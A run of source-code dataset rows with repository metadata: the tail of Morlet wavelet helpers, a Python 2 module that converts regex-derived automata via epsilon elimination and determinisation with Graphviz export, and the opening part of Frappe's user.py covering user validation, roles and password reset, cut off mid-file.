result : numpy array
The results
"""
return (freqs / float(n_cycles)) * 2
def calc_wavelet_duration(freqs, n_cycles):
"""Calculate the wavelet duration for a Morlet wavelet in ms.
The formula is: (cycle / frequencies / pi)*1000
Parameters
----------
freqs : numpy array
The frequencies to be calculated.
n_cycles : int or numpy array
The number of cycles used. Can be integer for the same cycle for all
frequencies, or a numpy array for individual cycles per frequency.
Returns
-------
result : numpy array
The results
"""
return (float(n_cycles) / freqs / np.pi) * 1000
| bsd-3-clause | 6,559,354,453,207,024,000 | 27.005291 | 79 | 0.543737 | false |
termNinja/Conversion-of-Regex-into-Automatons | pyscripts/classes/resources.py | 1 | 18835 | import re, os, sys
from Queue import Queue
# -----------------------------------------------------------------------------
class term_colors:
""" Usage: print term_colors.WARNING + "This is a msg" + term_colors.ENDC """
HEADER = '\033[95m'
OKBLUE = '\033[94m'
OKGREEN = '\033[92m'
WARNING = '\033[93m'
FAIL = '\033[91m'
ENDC = '\033[0m'
BOLD = '\033[1m'
UNDERLINE = '\033[4m'
# -----------------------------------------------------------------------------
class xlogger:
@staticmethod
def dbg(msg):
""" Prints a debugging msg onto stderr """
print >> sys.stderr, term_colors.FAIL + str(msg) + term_colors.ENDC
@staticmethod
def warn(msg):
""" Prints a warning msg onto stderr """
print >> sys.stderr, term_colors.WARNING + str(msg) + term_colors.ENDC
@staticmethod
def info(msg):
""" Prints an info msg onto stderr """
print >> sys.stderr, term_colors.OKBLUE + str(msg) + term_colors.ENDC
@staticmethod
def fine(msg):
""" Prints an ok msg onto stderr """
print >> sys.stderr, term_colors.OKGREEN + str(msg) + term_colors.ENDC
# -----------------------------------------------------------------------------
# handy macro
class algo_step:
thompson = "_01_thompson"
elimeps = "_02_elimeps"
determ = "_03_determ"
minim = "_04_minim"
# -----------------------------------------------------------------------------
# VERY IMPORTANT:
# -----------------------------------------------------------------------------
# I changed type of end_node into STRING type, if error occurs BEFORE determinisation,
# make sure to check it wasn't caused by this
# -----------------------------------------------------------------------------
class Edge:
def __init__(self, end_node, weight):
"""
Initializes edge object.
end_node -> string
weight -> string
"""
self.end_node = str(end_node)
self.weight = str(weight)
def __str__(self):
return "(" + str(self.end_node) + ", " + str(self.weight) + ")"
def __eq__(self, other):
if self.end_node == other.end_node and self.weight == other.weight:
return True
else:
return False
def __hash__(self):
return hash(self.end_node) ^ hash(self.weight)
# -----------------------------------------------------------------------------
class Node:
def __init__(self, node_val, is_ending):
self.node_val = int(node_val)
self.is_ending = bool(is_ending)
def __str__(self):
if self.is_ending:
return "(" + str(self.node_val) + ")"
else:
return str(self.node_val)
# When reading thomhpson's graph from .gv file, we KNOW that
# node 1 is ENDING state, because that's how Thompson's algorithm was implemented
# for this particular project.
# -----------------------------------------------------------------------------
class Graph:
# -------------------------------------------------------------------------
def __init__(self, graph_map, graph_name):
self.graph_map = {}
self.graph_name = graph_name
self.ending_nodes = [int(1)]
for ending_node in self.ending_nodes:
self.graph_map[ending_node] = []
# -------------------------------------------------------------------------
def __str__(self):
output = str(self.graph_name) + "\n-----------------------------\n"
output += str(self.graph_map)
return output
# -------------------------------------------------------------------------
def form_graph_from_gv(self):
"""
Reads the .gv file that represent the graph
and maps it onto Graph object.
"""
print "reading graph: " + self.graph_name
# algo_step.thompson because python continues where C stopped with work
# => Thompson algorithm has been performed
f = open("../graphs/" + self.graph_name + algo_step.thompson + ".gv", "r")
data = f.read()
f.close()
print "Graph data:"
print data
print
# -----------------------------------------------------------------------------------------
# -----------------------------------------------------------------------------------------
# Forming graph
regex = r"\"([a-zA-Z0-9]+)\"\s*->\s*\"([a-zA-Z0-9]+)\"\s*"
regex += r"(\[label\s*[=]\s*\"([a-zA-Z0-9]+)\"\])?"
regex = re.compile(regex)
for iter in regex.finditer(data):
node_val = iter.group(1)
into_node = iter.group(2)
if iter.group(4) == None:
graph_weight = "eps"
else:
graph_weight = iter.group(4)
# Creating node
# NOTICE TODO: Node objects aren't actually needed. It can be removed...later though
if int(node_val) in self.ending_nodes:
node = Node(node_val, True)
print "making " + str(node_val) + "into ending node!"
else:
node = Node(int(node_val), False)
# Creating edge
edge = Edge(into_node, graph_weight)
print node, edge
if node.node_val in self.graph_map.keys():
self.graph_map[node.node_val].append(edge)
else:
self.graph_map[node.node_val] = []
self.graph_map[node.node_val].append(edge)
## TODO remove this, i've put it for testing purposes
self.elim_eps()
self.determinize()
# -------------------------------------------------------------------------
def export_as_gv(self, algstep):
"""
Maps Graph object as gv file.
"""
output_text = []
output_text.append("digraph finite_state_machine {\n")
output_text.append("graph [fontname = \"lmroman12\"];\n")
output_text.append("node [fontname = \"lmroman12\"];\n")
output_text.append("edge [fontname = \"lmroman12\"];\n")
output_text.append("\trankdir=LR;\n")
output_text.append("\tsize=\"8,5\"\n")
output_text.append("\tnode [shape = doublecircle]; ")
for node in self.ending_nodes:
output_text.append("\"")
output_text.append(str(node))
output_text.append("\"")
output_text.append(",")
output_text[-1] = ";\n"
output_text.append("\tnode [shape = circle];\n")
# lets fill in the elements
nodes = self.graph_map.keys()
for node in nodes:
edges = self.graph_map[node]
for edge in edges:
output_text.append("\t\"" + str(node) + "\" -> \"" + str(edge.end_node) + "\"")
# check if it was epsilon
if edge.weight != "eps":
output_text.append(" [label=\"" + str(edge.weight) + "\"]")
output_text.append("\n")
output_text.append("}")
# writing into file
f = open(self.graph_name + str(algstep) + ".gv", "w")
# f = open("tester.gv", "w")
f.write("".join(output_text))
f.close()
# -------------------------------------------------------------------------
# Export graph structure as pdf
# command is:
# dot -Tpdf ../../graphs/source_file.gv -o ../../graphs/output.pdf
def export_as_pdf(self, algstep):
"""
Draw a vector image of graph that it reads
from gv file (make sure you have it created).
Uses dot from graphviz to acomplish this amazing task.
"""
graph_id = self.graph_name.split("_")[0]
output_name = self.graph_name + str(algstep)
os.system("dot -Tpdf " + output_name + ".gv -o " + output_name + ".pdf")
return 1
# -------------------------------------------------------------------------
def elim_eps(self):
"""
Performs algorithm that eliminates epsilon edges in graph.
Wrapper for solve_eps_prob.
"""
new_map = {0: []}
new_ending_nodes = []
visited_nodes = {0: False}
visited = {}
for node in self.graph_map.keys():
visited[node] = {}
for tmp_node in self.graph_map.keys():
visited[node][tmp_node] = False
self.solve_eps_prob(0, 0, new_map, visited, new_ending_nodes)
self.graph_map = new_map
self.ending_nodes = new_ending_nodes
self.export_as_gv(algo_step.elimeps)
self.export_as_pdf(algo_step.elimeps)
xlogger.fine("Exported: " + self.graph_name + algo_step.elimeps + ".gv")
xlogger.fine("Exported: " + self.graph_name + algo_step.elimeps + ".pdf")
# -------------------------------------------------------------------------
def solve_eps_prob(self, root_node, current_node, new_map, visited, ending_nodes):
"""
Recursive method that peforms a DFS search and eliminates epsilon edges.
"""
visited[root_node][current_node] = True
if current_node in self.ending_nodes:
ending_nodes.append(root_node)
return
for adj in self.graph_map[current_node]:
if adj.weight == "eps" and not visited[root_node][int(adj.end_node)]:
self.solve_eps_prob(root_node, int(adj.end_node), new_map, visited, ending_nodes)
elif adj.weight == "eps":
return
else:
if not root_node in new_map.keys():
new_map[root_node] = []
new_map[root_node].append(adj)
if not visited[root_node][int(adj.end_node)]:
self.solve_eps_prob(int(adj.end_node), int(adj.end_node), new_map, visited, ending_nodes)
# -------------------------------------------------------------------------
# -------------------------------------------------------------------------
def determinize(self):
"""
Performs the determinisation algorithm.
"""
# we switch to string keys because of new states
queue = Queue() # queue.get() queue.put(item)
queue.put("0") # 0 is always the starting node
new_map = {}
new_map["0"] = set()
while queue.qsize() > 0:
print
print "----------------------------------------------------------"
xlogger.info("Queue state: " + str([item for item in queue.queue]))
print "----------------------------------------------------------"
current_node = queue.get()
xlogger.info("Took " + str(current_node) + " from queue.")
# find all adjacent vertices
# gives something like: "1,2,3"
# gives a hash map like:
# str(a) -> set(int(1), ...) str(b) -> set(int(5), int(6), int(7))
xlogger.info("Calling find_adjacent_nodes with " + str(current_node))
adjacent_nodes = self.find_adjacent_nodes(current_node)
xlogger.info("Adjacent nodes: " + str(adjacent_nodes))
# update a map row if required for new deterministic nodes
self.update_new_map_row(current_node, adjacent_nodes, new_map, queue)
xlogger.fine("Determinized graph:")
for key in new_map.keys():
print str(key) + "->"
for elem in new_map[key]:
print "---->" + str(elem)
self.convert_into_object_map(new_map)
self.export_as_gv(algo_step.determ)
self.export_as_pdf(algo_step.determ)
# ----------------------------------------------------------------------
# Used by method: determinize
# ----------------------------------------------------------------------
def update_new_map_row(self, current_node, adjacent_nodes, new_map, queue):
"""
Used as a helper function in determinsation algorithm.
It initialises and transforms some things in main graph object.
"""
# For each weight in array
for weight in adjacent_nodes.keys():
# --------------------------------------------------------------
# We iterate over set of ints and form a string
# --------------------------------------------------------------
new_node = []
new_edges = []
for elem in adjacent_nodes[weight]:
# forming a string
new_node.append(str(elem))
new_node.append(",")
new_node = "".join(new_node)[0:-1] # cut , at the end
xlogger.info("formed string: " + new_node)
# --------------------------------------------------------------
elem = self.list_to_string(adjacent_nodes[weight])
xlogger.info("result from [a] -> str: " + str(elem))
xlogger.info("type(" + str(elem) + " is " + str(type(elem)))
# new_map[current_node] = elem
if not current_node in new_map:
new_map[current_node] = set()
new_map[current_node].add((weight, elem))
## now we check if new_node is in new_map.keys(),
## if so, we ignore it, if not, we add it into queue and update
## it's adjacent nodes
print type(new_node)
if not new_node in new_map.keys():
## adding into queue
xlogger.info("adding into queue: " + str(new_node))
queue.put(new_node)
## updating
# new_map[new_node] = []
# ----------------------------------------------------------------------
def list_to_string(self, nodelist):
"""
Converts a list of elements onto string with character ',' as separator
[1, 2, 3] => "1,2,3"
"""
print
res = []
for elem in nodelist:
res.append(str(elem))
res.append(",")
res = "".join(res)[0:-1] # cut , at the end
xlogger.dbg("Done conversion: " + str(res))
print
return res
# ----------------------------------------------------------------------
def string_to_list(self, nodestr):
"""
Converts a , separated string into a list of strings.
It also sorts the list.
"1,2,3" => [1, 2, 3]
"ab,cd" => ["ab", "cd"]
"""
if nodestr[-1] == ",":
nodestr = nodestr.split(",")[0:-1]
else:
nodestr = nodestr.split(",")
tmp = []
xlogger.dbg("string_to_list: ")
xlogger.dbg("nodestr: " + str(nodestr))
for elem in nodestr:
tmp.append(int(elem))
tmp.sort()
nodestr = []
for elem in tmp:
nodestr.append(str(elem))
xlogger.dbg("nodestr: " + str(nodestr))
return nodestr
# ----------------------------------------------------------------------
# Used by method: determinize
# ----------------------------------------------------------------------
def find_adjacent_nodes(self, current_node):
"""
Used as a helper function in determinsation algorithm.
It finds adjacent nodes for a given node.
"""
xlogger.info("Entered find_adjacent_nodes with current_node = " + str(current_node))
# current node can be something like: "0,3,5"
adjacent_nodes = {} # example: a -> "1,2,3" b -> "3,4,5"
# [1, 2, 3] -> "1,2,3"
xlogger.dbg("calling conversion for: " + str(current_node))
current_node = self.string_to_list(current_node)
xlogger.info("updated current_node, current_node = " + str(current_node))
# ['0', '3', '5] -> '0', '3', '5'
xlogger.dbg("current node: " + str(current_node))
for node in current_node:
xlogger.dbg("node: " + str(node))
if int(node) in self.graph_map.keys():
for edge in self.graph_map[int(node)]:
if edge.weight not in adjacent_nodes:
adjacent_nodes[edge.weight] = set()
adjacent_nodes[edge.weight].add(int(edge.end_node))
return adjacent_nodes
# ----------------------------------------------------------------------
def convert_into_object_map(self, new_map):
"""
Converts a temp hash map created during determinisation algorithm
onto a main graph map used for storing a graph.
It also sets ending nodes.
"""
ending_nodes = []
self.graph_map.clear()
graph_nodes = new_map.keys()
for node in graph_nodes:
self.graph_map[node] = []
for edge in new_map[node]:
# ('1,2,3', 'a')
self.graph_map[node].append(Edge(edge[1], edge[0]))
if not edge[1] in graph_nodes:
self.graph_map[edge[1]] = []
# finding ending nodes
# node => "11,3" for example
for node in self.graph_map.keys():
nodez = self.string_to_list(node)
for elem in nodez:
xlogger.dbg("elem: " + str(elem))
if int(elem) in self.ending_nodes:
ending_nodes.append(str(node))
break
xlogger.info("old ending nodes: " + str(self.ending_nodes))
xlogger.info("new ending nodes: " + str(ending_nodes))
# adding nodes that don't have an output edge
# currently, they are implicitly given in our graph structure
# they appear only in edges in map (example: 3 has no output edge)
# For example, "1,2" -> ("ab", "3")
# Lets find nodes like this and add them into main map
for node in graph_nodes:
for edge in new_map[node]:
if not edge[1] in graph_nodes:
self.graph_map[edge[1]] = []
# Finally, we form the ending nodes in Graph object
self.ending_nodes = ending_nodes
print
self.show_graph()
# ----------------------------------------------------------------------
# ----------------------------------------------------------------------
def show_graph(self):
"""
Prints graph to stdout.
"""
for node in self.graph_map.keys():
print node
for edge in self.graph_map[node]:
print " -> " + str(edge)
# ----------------------------------------------------------------------
# TODO: Nexto to implement
# ----------------------------------------------------------------------
def minimize():
"""
Performs minimization algorithm.
"""
return 1
# -----------------------------------------------------------------------------
| gpl-3.0 | -8,287,676,522,294,573,000 | 38.239583 | 109 | 0.45219 | false |
saurabh6790/frappe | frappe/core/doctype/user/user.py | 1 | 39931 | # Copyright (c) 2015, Frappe Technologies Pvt. Ltd. and Contributors
# MIT License. See license.txt
from __future__ import unicode_literals, print_function
from bs4 import BeautifulSoup
import frappe
import frappe.share
import frappe.defaults
import frappe.permissions
from frappe.model.document import Document
from frappe.utils import (cint, flt, has_gravatar, escape_html, format_datetime,
now_datetime, get_formatted_email, today)
from frappe import throw, msgprint, _
from frappe.utils.password import update_password as _update_password, check_password, get_password_reset_limit
from frappe.desk.notifications import clear_notifications
from frappe.desk.doctype.notification_settings.notification_settings import create_notification_settings, toggle_notifications
from frappe.utils.user import get_system_managers
from frappe.website.utils import is_signup_enabled
from frappe.rate_limiter import rate_limit
from frappe.utils.background_jobs import enqueue
from frappe.core.doctype.user_type.user_type import user_linked_with_permission_on_doctype
STANDARD_USERS = ("Guest", "Administrator")
class MaxUsersReachedError(frappe.ValidationError):
pass
class User(Document):
__new_password = None
def __setup__(self):
# because it is handled separately
self.flags.ignore_save_passwords = ['new_password']
def autoname(self):
"""set name as Email Address"""
if self.get("is_admin") or self.get("is_guest"):
self.name = self.first_name
else:
self.email = self.email.strip().lower()
self.name = self.email
def onload(self):
from frappe.config import get_modules_from_all_apps
self.set_onload('all_modules',
[m.get("module_name") for m in get_modules_from_all_apps()])
def before_insert(self):
self.flags.in_insert = True
throttle_user_creation()
def after_insert(self):
create_notification_settings(self.name)
frappe.cache().delete_key('users_for_mentions')
def validate(self):
self.check_demo()
# clear new password
self.__new_password = self.new_password
self.new_password = ""
if not frappe.flags.in_test:
self.password_strength_test()
if self.name not in STANDARD_USERS:
self.validate_email_type(self.email)
self.validate_email_type(self.name)
self.add_system_manager_role()
self.set_system_user()
self.set_full_name()
self.check_enable_disable()
self.ensure_unique_roles()
self.remove_all_roles_for_guest()
self.validate_username()
self.remove_disabled_roles()
self.validate_user_email_inbox()
ask_pass_update()
self.validate_roles()
self.validate_allowed_modules()
self.validate_user_image()
if self.language == "Loading...":
self.language = None
if (self.name not in ["Administrator", "Guest"]) and (not self.get_social_login_userid("frappe")):
self.set_social_login_userid("frappe", frappe.generate_hash(length=39))
def validate_roles(self):
if self.role_profile_name:
role_profile = frappe.get_doc('Role Profile', self.role_profile_name)
self.set('roles', [])
self.append_roles(*[role.role for role in role_profile.roles])
def validate_allowed_modules(self):
if self.module_profile:
module_profile = frappe.get_doc('Module Profile', self.module_profile)
self.set('block_modules', [])
for d in module_profile.get('block_modules'):
self.append('block_modules', {
'module': d.module
})
def validate_user_image(self):
if self.user_image and len(self.user_image) > 2000:
frappe.throw(_("Not a valid User Image."))
def on_update(self):
# clear new password
self.share_with_self()
clear_notifications(user=self.name)
frappe.clear_cache(user=self.name)
now=frappe.flags.in_test or frappe.flags.in_install
self.send_password_notification(self.__new_password)
frappe.enqueue(
'frappe.core.doctype.user.user.create_contact',
user=self,
ignore_mandatory=True,
now=now
)
if self.name not in ('Administrator', 'Guest') and not self.user_image:
frappe.enqueue('frappe.core.doctype.user.user.update_gravatar', name=self.name, now=now)
# Set user selected timezone
if self.time_zone:
frappe.defaults.set_default("time_zone", self.time_zone, self.name)
if self.has_value_changed('allow_in_mentions') or self.has_value_changed('user_type'):
frappe.cache().delete_key('users_for_mentions')
def has_website_permission(self, ptype, user, verbose=False):
"""Returns true if current user is the session user"""
return self.name == frappe.session.user
def check_demo(self):
if frappe.session.user == '[email protected]':
frappe.throw(_('Cannot change user details in demo. Please signup for a new account at https://erpnext.com'), title=_('Not Allowed'))
def set_full_name(self):
self.full_name = " ".join(filter(None, [self.first_name, self.last_name]))
def check_enable_disable(self):
# do not allow disabling administrator/guest
if not cint(self.enabled) and self.name in STANDARD_USERS:
frappe.throw(_("User {0} cannot be disabled").format(self.name))
if not cint(self.enabled):
self.a_system_manager_should_exist()
# clear sessions if disabled
if not cint(self.enabled) and getattr(frappe.local, "login_manager", None):
frappe.local.login_manager.logout(user=self.name)
# toggle notifications based on the user's status
toggle_notifications(self.name, enable=cint(self.enabled))
def add_system_manager_role(self):
# if adding system manager, do nothing
if not cint(self.enabled) or ("System Manager" in [user_role.role for user_role in
self.get("roles")]):
return
if (self.name not in STANDARD_USERS and self.user_type == "System User" and not self.get_other_system_managers()
and cint(frappe.db.get_single_value('System Settings', 'setup_complete'))):
msgprint(_("Adding System Manager to this User as there must be atleast one System Manager"))
self.append("roles", {
"doctype": "Has Role",
"role": "System Manager"
})
if self.name == 'Administrator':
# Administrator should always have System Manager Role
self.extend("roles", [
{
"doctype": "Has Role",
"role": "System Manager"
},
{
"doctype": "Has Role",
"role": "Administrator"
}
])
def email_new_password(self, new_password=None):
if new_password and not self.flags.in_insert:
_update_password(user=self.name, pwd=new_password, logout_all_sessions=self.logout_all_sessions)
def set_system_user(self):
'''For the standard users like admin and guest, the user type is fixed.'''
user_type_mapper = {
'Administrator': 'System User',
'Guest': 'Website User'
}
if self.user_type and not frappe.get_cached_value('User Type', self.user_type, 'is_standard'):
if user_type_mapper.get(self.name):
self.user_type = user_type_mapper.get(self.name)
else:
self.set_roles_and_modules_based_on_user_type()
else:
'''Set as System User if any of the given roles has desk_access'''
self.user_type = 'System User' if self.has_desk_access() else 'Website User'
def set_roles_and_modules_based_on_user_type(self):
user_type_doc = frappe.get_cached_doc('User Type', self.user_type)
if user_type_doc.role:
self.roles = []
# Check whether User has linked with the 'Apply User Permission On' doctype or not
if user_linked_with_permission_on_doctype(user_type_doc, self.name):
self.append('roles', {
'role': user_type_doc.role
})
frappe.msgprint(_('Role has been set as per the user type {0}')
.format(self.user_type), alert=True)
user_type_doc.update_modules_in_user(self)
def has_desk_access(self):
'''Return true if any of the set roles has desk access'''
if not self.roles:
return False
return len(frappe.db.sql("""select name
from `tabRole` where desk_access=1
and name in ({0}) limit 1""".format(', '.join(['%s'] * len(self.roles))),
[d.role for d in self.roles]))
def share_with_self(self):
frappe.share.add(self.doctype, self.name, self.name, write=1, share=1,
flags={"ignore_share_permission": True})
def validate_share(self, docshare):
pass
# if docshare.user == self.name:
# if self.user_type=="System User":
# if docshare.share != 1:
# frappe.throw(_("Sorry! User should have complete access to their own record."))
# else:
# frappe.throw(_("Sorry! Sharing with Website User is prohibited."))
def send_password_notification(self, new_password):
try:
if self.flags.in_insert:
if self.name not in STANDARD_USERS:
if new_password:
# new password given, no email required
_update_password(user=self.name, pwd=new_password,
logout_all_sessions=self.logout_all_sessions)
if not self.flags.no_welcome_mail and cint(self.send_welcome_email):
self.send_welcome_mail_to_user()
self.flags.email_sent = 1
if frappe.session.user != 'Guest':
msgprint(_("Welcome email sent"))
return
else:
self.email_new_password(new_password)
except frappe.OutgoingEmailError:
print(frappe.get_traceback())
pass # email server not set, don't send email
@Document.hook
def validate_reset_password(self):
pass
def reset_password(self, send_email=False, password_expired=False):
from frappe.utils import random_string, get_url
key = random_string(32)
self.db_set("reset_password_key", key)
url = "/update-password?key=" + key
if password_expired:
url = "/update-password?key=" + key + '&password_expired=true'
link = get_url(url)
if send_email:
self.password_reset_mail(link)
return link
def get_other_system_managers(self):
return frappe.db.sql("""select distinct `user`.`name` from `tabHas Role` as `user_role`, `tabUser` as `user`
where user_role.role='System Manager'
and `user`.docstatus<2
and `user`.enabled=1
and `user_role`.parent = `user`.name
and `user_role`.parent not in ('Administrator', %s) limit 1""", (self.name,))
def get_fullname(self):
"""get first_name space last_name"""
return (self.first_name or '') + \
(self.first_name and " " or '') + (self.last_name or '')
def password_reset_mail(self, link):
self.send_login_mail(_("Password Reset"),
"password_reset", {"link": link}, now=True)
def send_welcome_mail_to_user(self):
from frappe.utils import get_url
link = self.reset_password()
subject = None
method = frappe.get_hooks("welcome_email")
if method:
subject = frappe.get_attr(method[-1])()
if not subject:
site_name = frappe.db.get_default('site_name') or frappe.get_conf().get("site_name")
if site_name:
subject = _("Welcome to {0}").format(site_name)
else:
subject = _("Complete Registration")
self.send_login_mail(subject, "new_user",
dict(
link=link,
site_url=get_url(),
))
def send_login_mail(self, subject, template, add_args, now=None):
"""send mail with login details"""
from frappe.utils.user import get_user_fullname
from frappe.utils import get_url
created_by = get_user_fullname(frappe.session['user'])
if created_by == "Guest":
created_by = "Administrator"
args = {
'first_name': self.first_name or self.last_name or "user",
'user': self.name,
'title': subject,
'login_url': get_url(),
'created_by': created_by
}
args.update(add_args)
sender = frappe.session.user not in STANDARD_USERS and get_formatted_email(frappe.session.user) or None
frappe.sendmail(recipients=self.email, sender=sender, subject=subject,
template=template, args=args, header=[subject, "green"],
delayed=(not now) if now!=None else self.flags.delay_emails, retry=3)
def a_system_manager_should_exist(self):
if not self.get_other_system_managers():
throw(_("There should remain at least one System Manager"))
def on_trash(self):
frappe.clear_cache(user=self.name)
if self.name in STANDARD_USERS:
throw(_("User {0} cannot be deleted").format(self.name))
self.a_system_manager_should_exist()
# disable the user and log him/her out
self.enabled = 0
if getattr(frappe.local, "login_manager", None):
frappe.local.login_manager.logout(user=self.name)
# delete todos
frappe.db.sql("""DELETE FROM `tabToDo` WHERE `owner`=%s""", (self.name,))
frappe.db.sql("""UPDATE `tabToDo` SET `assigned_by`=NULL WHERE `assigned_by`=%s""",
(self.name,))
# delete events
frappe.db.sql("""delete from `tabEvent` where owner=%s
and event_type='Private'""", (self.name,))
# delete shares
frappe.db.sql("""delete from `tabDocShare` where user=%s""", self.name)
# delete messages
frappe.db.sql("""delete from `tabCommunication`
where communication_type in ('Chat', 'Notification')
and reference_doctype='User'
and (reference_name=%s or owner=%s)""", (self.name, self.name))
# unlink contact
frappe.db.sql("""update `tabContact`
set `user`=null
where `user`=%s""", (self.name))
# delete notification settings
frappe.delete_doc("Notification Settings", self.name, ignore_permissions=True)
if self.get('allow_in_mentions'):
frappe.cache().delete_key('users_for_mentions')
def before_rename(self, old_name, new_name, merge=False):
self.check_demo()
frappe.clear_cache(user=old_name)
self.validate_rename(old_name, new_name)
def validate_rename(self, old_name, new_name):
# do not allow renaming administrator and guest
if old_name in STANDARD_USERS:
throw(_("User {0} cannot be renamed").format(self.name))
self.validate_email_type(new_name)
def validate_email_type(self, email):
from frappe.utils import validate_email_address
validate_email_address(email.strip(), True)
def after_rename(self, old_name, new_name, merge=False):
tables = frappe.db.get_tables()
for tab in tables:
desc = frappe.db.get_table_columns_description(tab)
has_fields = []
for d in desc:
if d.get('name') in ['owner', 'modified_by']:
has_fields.append(d.get('name'))
for field in has_fields:
frappe.db.sql("""UPDATE `%s`
SET `%s` = %s
WHERE `%s` = %s""" %
(tab, field, '%s', field, '%s'), (new_name, old_name))
if frappe.db.exists("Chat Profile", old_name):
frappe.rename_doc("Chat Profile", old_name, new_name, force=True, show_alert=False)
if frappe.db.exists("Notification Settings", old_name):
frappe.rename_doc("Notification Settings", old_name, new_name, force=True, show_alert=False)
# set email
frappe.db.sql("""UPDATE `tabUser`
SET email = %s
WHERE name = %s""", (new_name, new_name))
def append_roles(self, *roles):
"""Add roles to user"""
current_roles = [d.role for d in self.get("roles")]
for role in roles:
if role in current_roles:
continue
self.append("roles", {"role": role})
def add_roles(self, *roles):
"""Add roles to user and save"""
self.append_roles(*roles)
self.save()
def remove_roles(self, *roles):
existing_roles = dict((d.role, d) for d in self.get("roles"))
for role in roles:
if role in existing_roles:
self.get("roles").remove(existing_roles[role])
self.save()
def remove_all_roles_for_guest(self):
if self.name == "Guest":
self.set("roles", list(set(d for d in self.get("roles") if d.role == "Guest")))
def remove_disabled_roles(self):
disabled_roles = [d.name for d in frappe.get_all("Role", filters={"disabled":1})]
for role in list(self.get('roles')):
if role.role in disabled_roles:
self.get('roles').remove(role)
def ensure_unique_roles(self):
exists = []
for i, d in enumerate(self.get("roles")):
if (not d.role) or (d.role in exists):
self.get("roles").remove(d)
else:
exists.append(d.role)
def validate_username(self):
if not self.username and self.is_new() and self.first_name:
self.username = frappe.scrub(self.first_name)
if not self.username:
return
# strip space and @
self.username = self.username.strip(" @")
if self.username_exists():
if self.user_type == 'System User':
frappe.msgprint(_("Username {0} already exists").format(self.username))
self.suggest_username()
self.username = ""
def password_strength_test(self):
""" test password strength """
if self.flags.ignore_password_policy:
return
if self.__new_password:
user_data = (self.first_name, self.middle_name, self.last_name, self.email, self.birth_date)
result = test_password_strength(self.__new_password, '', None, user_data)
feedback = result.get("feedback", None)
if feedback and not feedback.get('password_policy_validation_passed', False):
handle_password_test_fail(result)
def suggest_username(self):
def _check_suggestion(suggestion):
if self.username != suggestion and not self.username_exists(suggestion):
return suggestion
return None
# @firstname
username = _check_suggestion(frappe.scrub(self.first_name))
if not username:
# @firstname_last_name
username = _check_suggestion(frappe.scrub("{0} {1}".format(self.first_name, self.last_name or "")))
if username:
frappe.msgprint(_("Suggested Username: {0}").format(username))
return username
def username_exists(self, username=None):
return frappe.db.get_value("User", {"username": username or self.username, "name": ("!=", self.name)})
def get_blocked_modules(self):
"""Returns list of modules blocked for that user"""
return [d.module for d in self.block_modules] if self.block_modules else []
def validate_user_email_inbox(self):
""" check if same email account added in User Emails twice """
email_accounts = [ user_email.email_account for user_email in self.user_emails ]
if len(email_accounts) != len(set(email_accounts)):
frappe.throw(_("Email Account added multiple times"))
def get_social_login_userid(self, provider):
try:
for p in self.social_logins:
if p.provider == provider:
return p.userid
except:
return None
def set_social_login_userid(self, provider, userid, username=None):
social_logins = {
"provider": provider,
"userid": userid
}
if username:
social_logins["username"] = username
self.append("social_logins", social_logins)
def get_restricted_ip_list(self):
if not self.restrict_ip:
return
return [i.strip() for i in self.restrict_ip.split(",")]
@classmethod
def find_by_credentials(cls, user_name: str, password: str, validate_password: bool = True):
"""Find the user by credentials.
This is a login utility that needs to check login related system settings while finding the user.
1. Find user by email ID by default
2. If allow_login_using_mobile_number is set, you can use mobile number while finding the user.
3. If allow_login_using_user_name is set, you can use username while finding the user.
"""
login_with_mobile = cint(frappe.db.get_value("System Settings", "System Settings", "allow_login_using_mobile_number"))
login_with_username = cint(frappe.db.get_value("System Settings", "System Settings", "allow_login_using_user_name"))
or_filters = [{"name": user_name}]
if login_with_mobile:
or_filters.append({"mobile_no": user_name})
if login_with_username:
or_filters.append({"username": user_name})
users = frappe.db.get_all('User', fields=['name', 'enabled'], or_filters=or_filters, limit=1)
if not users:
return
user = users[0]
user['is_authenticated'] = True
if validate_password:
try:
check_password(user['name'], password, delete_tracker_cache=False)
except frappe.AuthenticationError:
user['is_authenticated'] = False
return user
@frappe.whitelist()
def get_timezones():
import pytz
return {
"timezones": pytz.all_timezones
}
@frappe.whitelist()
def get_all_roles(arg=None):
"""return all roles"""
active_domains = frappe.get_active_domains()
roles = frappe.get_all("Role", filters={
"name": ("not in", "Administrator,Guest,All"),
"disabled": 0
}, or_filters={
"ifnull(restrict_to_domain, '')": "",
"restrict_to_domain": ("in", active_domains)
}, order_by="name")
return [ role.get("name") for role in roles ]
@frappe.whitelist()
def get_roles(arg=None):
"""get roles for a user"""
return frappe.get_roles(frappe.form_dict['uid'])
@frappe.whitelist()
def get_perm_info(role):
"""get permission info"""
from frappe.permissions import get_all_perms
return get_all_perms(role)
@frappe.whitelist(allow_guest=True)
def update_password(new_password, logout_all_sessions=0, key=None, old_password=None):
#validate key to avoid key input like ['like', '%'], '', ['in', ['']]
if key and not isinstance(key, str):
frappe.throw(_('Invalid key type'))
result = test_password_strength(new_password, key, old_password)
feedback = result.get("feedback", None)
if feedback and not feedback.get('password_policy_validation_passed', False):
handle_password_test_fail(result)
res = _get_user_for_update_password(key, old_password)
if res.get('message'):
frappe.local.response.http_status_code = 410
return res['message']
else:
user = res['user']
logout_all_sessions = cint(logout_all_sessions) or frappe.db.get_single_value("System Settings", "logout_on_password_reset")
_update_password(user, new_password, logout_all_sessions=cint(logout_all_sessions))
user_doc, redirect_url = reset_user_data(user)
# get redirect url from cache
redirect_to = frappe.cache().hget('redirect_after_login', user)
if redirect_to:
redirect_url = redirect_to
frappe.cache().hdel('redirect_after_login', user)
frappe.local.login_manager.login_as(user)
frappe.db.set_value("User", user, "last_password_reset_date", today())
frappe.db.set_value("User", user, "reset_password_key", "")
if user_doc.user_type == "System User":
return "/app"
else:
return redirect_url if redirect_url else "/"
@frappe.whitelist(allow_guest=True)
def test_password_strength(new_password, key=None, old_password=None, user_data=None):
from frappe.utils.password_strength import test_password_strength as _test_password_strength
password_policy = frappe.db.get_value("System Settings", None,
["enable_password_policy", "minimum_password_score"], as_dict=True) or {}
enable_password_policy = cint(password_policy.get("enable_password_policy", 0))
minimum_password_score = cint(password_policy.get("minimum_password_score", 0))
if not enable_password_policy:
return {}
if not user_data:
user_data = frappe.db.get_value('User', frappe.session.user,
['first_name', 'middle_name', 'last_name', 'email', 'birth_date'])
if new_password:
result = _test_password_strength(new_password, user_inputs=user_data)
password_policy_validation_passed = False
# score should be greater than 0 and minimum_password_score
if result.get('score') and result.get('score') >= minimum_password_score:
password_policy_validation_passed = True
result['feedback']['password_policy_validation_passed'] = password_policy_validation_passed
return result
#for login
